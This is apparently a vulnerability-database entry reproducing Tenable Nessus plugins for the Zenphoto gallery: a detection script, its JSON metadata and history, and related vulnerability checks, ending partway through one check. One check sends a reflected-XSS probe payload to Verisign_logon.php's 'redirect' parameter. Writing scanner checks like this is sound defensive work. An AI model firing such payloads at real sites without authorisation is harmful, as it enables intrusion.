ID ZENPHOTO_DETECT.NASL Type nessus Reporter Tenable Modified 2018-11-15T00:00:00
Description
The remote host is running Zenphoto, a web-based photo gallery system written in PHP.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(49287);
script_version("1.6");
script_cvs_date("Date: 2018/11/15 20:50:19");
script_name(english:"Zenphoto Detection");
script_summary(english:"Looks for Zenphoto");
script_set_attribute(
attribute:"synopsis",
value:
"The remote web server is running a photo gallery system written in
PHP."
);
script_set_attribute(
attribute:"description",
value:
"The remote host is running Zenphoto, a web-based photo gallery system
written in PHP."
);
script_set_attribute(attribute:"see_also", value:"https://www.zenphoto.org/");
script_set_attribute(attribute:"solution", value:"n/a");
script_set_attribute(attribute:"risk_factor", value:"None");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/09/20");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:zenphoto:zenphoto");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/PHP");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
port = get_http_port(default:80, php: TRUE);
installs = NULL;
dirs = cgi_dirs();
ver_comment_pat = "<!-- zenphoto version ([0-9.]+) (\[|r-)([0-9]+)";
ver_comment_pat2 = "<!-- zenphoto version ([0-9.]+)";
if (thorough_tests)
{
dirs = make_list(dirs, '/zenphoto', '/gallery', '/photos', '/album');
dirs = list_uniq(dirs);
}
foreach dir (dirs)
{
ver = NULL;
matches = NULL;
url = dir + '/';
res = http_send_recv3(method: "GET", item: url, port: port, exit_on_fail: TRUE);
if ( '<!-- zenphoto version' >< res[2])
{
matches = eregmatch(pattern:ver_comment_pat , string:res[2], icase:FALSE);
if (!matches)
matches = eregmatch(pattern:ver_comment_pat2 , string:res[2], icase:FALSE);
ver = matches[1];
if (matches[3])
ver = ver + ' ' + matches[3]; # include build number
}
else if (
'Powered by <a href="http://www.zenphoto.org" title="' >< res[2] ||
'Powered by Zenphoto' >< res[2]
)
ver = NULL;
else
continue;
# Make sure this is not a gallery page inside an install
if (egrep(string:res[2], pattern: '<link rel=\\"alternate\\" type=\\"application\\/rss\\+xml.*albumtitle=.*albumname=')) continue;
installs = add_install(
installs : installs,
dir : dir,
appname : 'zenphoto',
ver : ver,
port : port
);
if (!thorough_tests) break;
}
if (isnull(installs)) exit(0, "Zenphoto wasn't detected on port "+port+".");
if (report_verbosity > 0)
{
report = get_install_report(
display_name : 'Zenphoto',
installs : installs,
port : port
);
security_note(port: port, extra: report);
}
else security_note(port);
{"id": "ZENPHOTO_DETECT.NASL", "bulletinFamily": "scanner", "title": "Zenphoto Detection", "description": "The remote host is running Zenphoto, a web-based photo gallery system written in PHP.", "published": "2010-09-20T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=49287", "reporter": "Tenable", "references": ["https://www.zenphoto.org/"], "cvelist": [], "type": "nessus", "lastseen": "2018-11-17T02:50:35", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is running Zenphoto, a web-based photo gallery system written in PHP.", "edition": 1, "enchantments": {}, "hash": "80664d94a09406c7a20bb628a778078eabbd6bb5366226c18bce9d418cc1b9f4", "hashmap": [{"hash": "017e3cdfbb52cd9828ec3136354c54b2", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "61439449b402d2583d4ba3b6e573a38a", "key": "sourceData"}, {"hash": "e276befbc17928e96d72bc5aea7d619a", "key": "published"}, {"hash": "73c6cf9ca59c39475b3dc548248f138d", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "79b38d56d1637d3466a5e272cf71daac", "key": "description"}, {"hash": "c19e76b063407e9640a4a382335d8cc1", "key": "references"}, {"hash": "74e37e674c8657d25e707f5059c4ecd2", "key": "title"}, {"hash": "1c362e980a0d97faa19e4a6d8bfcd4c6", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=49287", "id": "ZENPHOTO_DETECT.NASL", "lastseen": "2016-09-26T17:23:19", "modified": "2014-08-09T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "49287", "published": "2010-09-20T00:00:00", "references": ["http://www.zenphoto.org/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(49287);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2014/08/09 00:11:26 $\");\n\n script_name(english:\"Zenphoto Detection\");\n script_summary(english:\"Looks for Zenphoto\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server is running a photo gallery system written in\nPHP.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is running Zenphoto, a web-based photo gallery system\nwritten in PHP.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zenphoto.org/\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zenphoto:zenphoto\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php: TRUE);\n\ninstalls = NULL;\ndirs = cgi_dirs();\nver_comment_pat = \"<!-- zenphoto version ([0-9.]+) (\\[|r-)([0-9]+)\";\nver_comment_pat2 = \"<!-- zenphoto version ([0-9.]+)\";\n\nif (thorough_tests)\n{\n dirs = make_list(dirs, '/zenphoto', '/gallery', '/photos', '/album');\n dirs = list_uniq(dirs);\n}\n\nforeach dir (dirs)\n{\n ver = NULL;\n matches = NULL;\n\n url = dir + '/';\n res = http_send_recv3(method: \"GET\", item: url, port: port, exit_on_fail: TRUE);\n\n if ( '<!-- zenphoto version' >< res[2])\n {\n matches = eregmatch(pattern:ver_comment_pat , string:res[2], icase:FALSE);\n\n if (!matches)\n matches = eregmatch(pattern:ver_comment_pat2 , string:res[2], icase:FALSE);\n\n ver = matches[1];\n\n if (matches[3])\n ver = ver + ' ' + matches[3]; # include build number\n }\n else if (\n 'Powered by <a href=\"http://www.zenphoto.org\" title=\"' >< res[2] ||\n 'Powered by Zenphoto' >< res[2]\n )\n ver = NULL;\n else\n continue;\n\n # Make sure this is not a gallery page inside an install\n if (egrep(string:res[2], pattern: '<link rel=\\\\\"alternate\\\\\" type=\\\\\"application\\\\/rss\\\\+xml.*albumtitle=.*albumname=')) continue;\n\n installs = add_install(\n installs : installs,\n dir : dir,\n appname : 'zenphoto',\n ver : ver,\n port : port\n );\n\n if (!thorough_tests) break;\n}\n\nif (isnull(installs)) exit(0, \"Zenphoto wasn't detected on port \"+port+\".\");\n\nif (report_verbosity > 0)\n{\n report = get_install_report(\n display_name : 'Zenphoto',\n installs : installs,\n port : port\n );\n security_note(port: port, extra: report);\n}\nelse security_note(port);\n", "title": "Zenphoto Detection", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:19"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:zenphoto:zenphoto"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is running Zenphoto, a web-based photo gallery system written in PHP.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "378405f4f87712204381854b4221bb077349e18d755bf5940d497f144b28a8a5", "hashmap": [{"hash": "017e3cdfbb52cd9828ec3136354c54b2", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "61439449b402d2583d4ba3b6e573a38a", "key": "sourceData"}, {"hash": "e276befbc17928e96d72bc5aea7d619a", "key": "published"}, {"hash": "73c6cf9ca59c39475b3dc548248f138d", "key": "href"}, {"hash": "96fa7ff0984fdd6995f3cc27ffff8555", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "79b38d56d1637d3466a5e272cf71daac", "key": "description"}, {"hash": "c19e76b063407e9640a4a382335d8cc1", "key": "references"}, {"hash": "74e37e674c8657d25e707f5059c4ecd2", "key": "title"}, {"hash": "1c362e980a0d97faa19e4a6d8bfcd4c6", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=49287", "id": "ZENPHOTO_DETECT.NASL", "lastseen": "2017-10-29T13:33:50", "modified": "2014-08-09T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "49287", "published": "2010-09-20T00:00:00", "references": ["http://www.zenphoto.org/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(49287);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2014/08/09 00:11:26 $\");\n\n script_name(english:\"Zenphoto Detection\");\n script_summary(english:\"Looks for Zenphoto\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server is running a photo gallery system written in\nPHP.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is running Zenphoto, a web-based photo gallery system\nwritten in PHP.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zenphoto.org/\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zenphoto:zenphoto\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php: TRUE);\n\ninstalls = NULL;\ndirs = cgi_dirs();\nver_comment_pat = \"<!-- zenphoto version ([0-9.]+) (\\[|r-)([0-9]+)\";\nver_comment_pat2 = \"<!-- zenphoto version ([0-9.]+)\";\n\nif (thorough_tests)\n{\n dirs = make_list(dirs, '/zenphoto', '/gallery', '/photos', '/album');\n dirs = list_uniq(dirs);\n}\n\nforeach dir (dirs)\n{\n ver = NULL;\n matches = NULL;\n\n url = dir + '/';\n res = http_send_recv3(method: \"GET\", item: url, port: port, exit_on_fail: TRUE);\n\n if ( '<!-- zenphoto version' >< res[2])\n {\n matches = eregmatch(pattern:ver_comment_pat , string:res[2], icase:FALSE);\n\n if (!matches)\n matches = eregmatch(pattern:ver_comment_pat2 , string:res[2], icase:FALSE);\n\n ver = matches[1];\n\n if (matches[3])\n ver = ver + ' ' + matches[3]; # include build number\n }\n else if (\n 'Powered by <a href=\"http://www.zenphoto.org\" title=\"' >< res[2] ||\n 'Powered by Zenphoto' >< res[2]\n )\n ver = NULL;\n else\n continue;\n\n # Make sure this is not a gallery page inside an install\n if (egrep(string:res[2], pattern: '<link rel=\\\\\"alternate\\\\\" type=\\\\\"application\\\\/rss\\\\+xml.*albumtitle=.*albumname=')) continue;\n\n installs = add_install(\n installs : installs,\n dir : dir,\n appname : 'zenphoto',\n ver : ver,\n port : port\n );\n\n if (!thorough_tests) break;\n}\n\nif (isnull(installs)) exit(0, \"Zenphoto wasn't detected on port \"+port+\".\");\n\nif (report_verbosity > 0)\n{\n report = get_install_report(\n display_name : 'Zenphoto',\n installs : installs,\n port : port\n );\n security_note(port: port, extra: report);\n}\nelse security_note(port);\n", "title": "Zenphoto Detection", "type": "nessus", "viewCount": 5}, "differentElements": ["references", "modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:33:50"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "96fa7ff0984fdd6995f3cc27ffff8555"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "79b38d56d1637d3466a5e272cf71daac"}, {"key": "href", "hash": "73c6cf9ca59c39475b3dc548248f138d"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "017e3cdfbb52cd9828ec3136354c54b2"}, {"key": "published", "hash": "e276befbc17928e96d72bc5aea7d619a"}, {"key": "references", "hash": "98eaec7140b604db2a47195be15283c0"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "6fc5884040e64d5e105809a257385f47"}, {"key": "title", "hash": "74e37e674c8657d25e707f5059c4ecd2"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "aefc0d67f06b5ebd3069fd93180d940100fbb5e1ed853a1d3f13109d24fe4aad", "viewCount": 5, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(49287);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_name(english:\"Zenphoto Detection\");\n script_summary(english:\"Looks for Zenphoto\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server is running a photo gallery system written in\nPHP.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is running Zenphoto, a web-based photo gallery system\nwritten in PHP.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zenphoto.org/\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zenphoto:zenphoto\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php: TRUE);\n\ninstalls = NULL;\ndirs = cgi_dirs();\nver_comment_pat = \"<!-- zenphoto version ([0-9.]+) (\\[|r-)([0-9]+)\";\nver_comment_pat2 = \"<!-- zenphoto version ([0-9.]+)\";\n\nif (thorough_tests)\n{\n dirs = make_list(dirs, '/zenphoto', '/gallery', '/photos', '/album');\n dirs = list_uniq(dirs);\n}\n\nforeach dir (dirs)\n{\n ver = NULL;\n matches = NULL;\n\n url = dir + '/';\n res = http_send_recv3(method: \"GET\", item: url, port: port, exit_on_fail: TRUE);\n\n if ( '<!-- zenphoto version' >< res[2])\n {\n matches = eregmatch(pattern:ver_comment_pat , string:res[2], icase:FALSE);\n\n if (!matches)\n matches = eregmatch(pattern:ver_comment_pat2 , string:res[2], icase:FALSE);\n\n ver = matches[1];\n\n if (matches[3])\n ver = ver + ' ' + matches[3]; # include build number\n }\n else if (\n 'Powered by <a href=\"http://www.zenphoto.org\" title=\"' >< res[2] ||\n 'Powered by Zenphoto' >< res[2]\n )\n ver = NULL;\n else\n continue;\n\n # Make sure this is not a gallery page inside an install\n if (egrep(string:res[2], pattern: '<link rel=\\\\\"alternate\\\\\" type=\\\\\"application\\\\/rss\\\\+xml.*albumtitle=.*albumname=')) continue;\n\n installs = add_install(\n installs : installs,\n dir : dir,\n appname : 'zenphoto',\n ver : ver,\n port : port\n );\n\n if (!thorough_tests) break;\n}\n\nif (isnull(installs)) exit(0, \"Zenphoto wasn't detected on port \"+port+\".\");\n\nif (report_verbosity > 0)\n{\n report = get_install_report(\n display_name : 'Zenphoto',\n installs : installs,\n port : port\n );\n security_note(port: port, extra: report);\n}\nelse security_note(port);\n", "naslFamily": "CGI abuses", "pluginID": "49287", "cpe": ["cpe:/a:zenphoto:zenphoto"]}
{"nessus": [{"lastseen": "2018-11-17T02:53:05", "references": ["https://www.zenphoto.org/news/zenphoto-1.4.3.4", "http://www.waraxe.us/content-96.html"], "pluginID": "63073", "description": "The version of Zenphoto installed on the remote host is affected by a cross-site scripting vulnerability because it fails to properly sanitize user input to the 'redirect' parameter of the 'zp-core/zp-extensions/federated_logon/Verisign_logon.php' script. An attacker may be able to leverage this issue to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site. \n\nNote that the install is also likely affected by several additional cross-site scripting issues as well as multiple SQL injections and other vulnerabilities, although Nessus has not tested for those.", "edition": 4, "reporter": "Tenable", "published": "2012-11-28T00:00:00", "title": "Zenphoto Verisign_logon.php redirect Parameter XSS", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "CGI abuses : XSS", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:zenphoto:zenphoto"], "id": "ZENPHOTO_VERISIGN_LOGON_REDIRECT_XSS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63073", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63073);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_bugtraq_id(56389);\n script_xref(name:\"EDB-ID\", value:\"22524\");\n\n script_name(english:\"Zenphoto Verisign_logon.php redirect Parameter XSS\");\n script_summary(english:\"Attempts a non-persistent XSS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is affected by a cross-\nsite scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Zenphoto installed on the remote host is affected by a\ncross-site scripting vulnerability because it fails to properly sanitize\nuser input to the 'redirect' parameter of the\n'zp-core/zp-extensions/federated_logon/Verisign_logon.php' script. An\nattacker may be able to leverage this issue to inject arbitrary HTML and\nscript code into a user's browser to be executed within the security\ncontext of the affected site. \n\nNote that the install is also likely affected by several additional\ncross-site scripting issues as well as multiple SQL injections and other\nvulnerabilities, although Nessus has not tested for those.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.waraxe.us/content-96.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zenphoto.org/news/zenphoto-1.4.3.4\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.4.3.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zenphoto:zenphoto\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"zenphoto_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/zenphoto\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(\n appname:\"zenphoto\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\ninstall_loc = build_url(port:port, qs:dir);\nurl = \"/zp-core/zp-extensions/federated_logon/Verisign_logon.php?redirect=\";\nxss_test = '\"+onclick=alert('+\"'\" +SCRIPT_NAME+'-'+unixtime()+\"'\" +')+w\"';\n\nres = http_send_recv3(\n port : port,\n method : \"GET\",\n item : dir + url + urlencode(str:xss_test),\n exit_on_fail : TRUE\n);\n\npass_str = '<a href=\"' + xss_test + '\"';\noutput = extract_pattern_from_resp(string:res[2], pattern:'ST:'+pass_str);\n\nif (pass_str >< res[2] && \"Verisign user id:\" >< res[2])\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to verify the issue using the following request :' +\n '\\n' +\n '\\n' + install_loc + url + xss_test +\n '\\n' +\n '\\n' + 'Note that clicking the \"Return to Zenphoto\" link will execute' +\n '\\n' + 'the JavaScript code and display an alert box to demonstrate the' +\n '\\n' + 'vulnerability.' +\n '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\n' + 'This produced the following response :' +\n '\\n' +\n '\\n' + output +\n '\\n';\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Zenphoto\", install_loc);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-17T02:54:38", "references": ["https://www.zenphoto.org/news/zenphoto-1.4.2.1", "http://www.zenphoto.org/trac/changeset/8995", "http://www.zenphoto.org/trac/changeset/8994", "https://www.htbridge.com/advisory/HTB23070"], "pluginID": "58454", "description": "The remote host contains a version of Zenphoto earlier than 1.4.2.1 that is affected by multiple vulnerabilities :\n\n - An input validation error in the file 'zp-core/zp-extensions/viewer_size_image.php' can allow arbitrary PHP code to be injected via the value of the cookie 'viewer_size_image_saved cookie'. Note that the plugin 'viewer_size_image' must be enabled for this vulnerability to be exploited. (CVE-2012-0993)\n\n - An input validation error in the file 'zp-core/admin-albumsort.php' can allow SQL injection attacks via the 'sortableList' parameter.\n (CVE-2012-0994)\n\n - Multiple cross-site scripting vulnerabilities exist in the following (CVE-2012-0995) :\n\n - 'zp-core/admin.php' via the 'msg' parameter\n - 'zp-core/admin.php' and undefined urls by appending malicious code to the end of the url\n - 'zp-core/admin-edit.php' via the 'album' parameter", "edition": 6, "reporter": "Tenable", "published": "2012-03-23T00:00:00", "title": "Zenphoto < 1.4.2.1 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0995", "CVE-2012-0993", "CVE-2012-0994"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:zenphoto:zenphoto"], "id": "ZENPHOTO_1_4_2_1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=58454", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58454);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2012-0993\", \"CVE-2012-0994\", \"CVE-2012-0995\");\n script_bugtraq_id(51916);\n\n script_name(english:\"Zenphoto < 1.4.2.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Zenphoto\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of Zenphoto earlier than 1.4.2.1\nthat is affected by multiple vulnerabilities :\n\n - An input validation error in the file\n 'zp-core/zp-extensions/viewer_size_image.php' can allow\n arbitrary PHP code to be injected via the value of the\n cookie 'viewer_size_image_saved cookie'. Note that the\n plugin 'viewer_size_image' must be enabled for this\n vulnerability to be exploited. (CVE-2012-0993)\n\n - An input validation error in the file\n 'zp-core/admin-albumsort.php' can allow SQL injection\n attacks via the 'sortableList' parameter.\n (CVE-2012-0994)\n\n - Multiple cross-site scripting vulnerabilities exist\n in the following (CVE-2012-0995) :\n\n - 'zp-core/admin.php' via the 'msg' parameter\n - 'zp-core/admin.php' and undefined urls by appending\n malicious code to the end of the url\n - 'zp-core/admin-edit.php' via the 'album' parameter\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.htbridge.com/advisory/HTB23070\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zenphoto.org/news/zenphoto-1.4.2.1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zenphoto.org/trac/changeset/8994\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zenphoto.org/trac/changeset/8995\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Zenphoto version 1.4.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Zenphoto 1.4.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/23\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zenphoto:zenphoto\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"zenphoto_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/zenphoto\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:\"zenphoto\", port:port, exit_on_fail:TRUE);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\ndir = install['dir'];\ninstall_url = build_url(port:port,qs:dir);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) exit(1, \"The version of Zenphoto located at \"+install_url+\" could not be determined.\");\n\nfixed_version = '1.4.2.1';\nfixed_build = '9138';\n\n# Separate the build number\npieces = split(version, sep:\" \", keep:FALSE);\nif 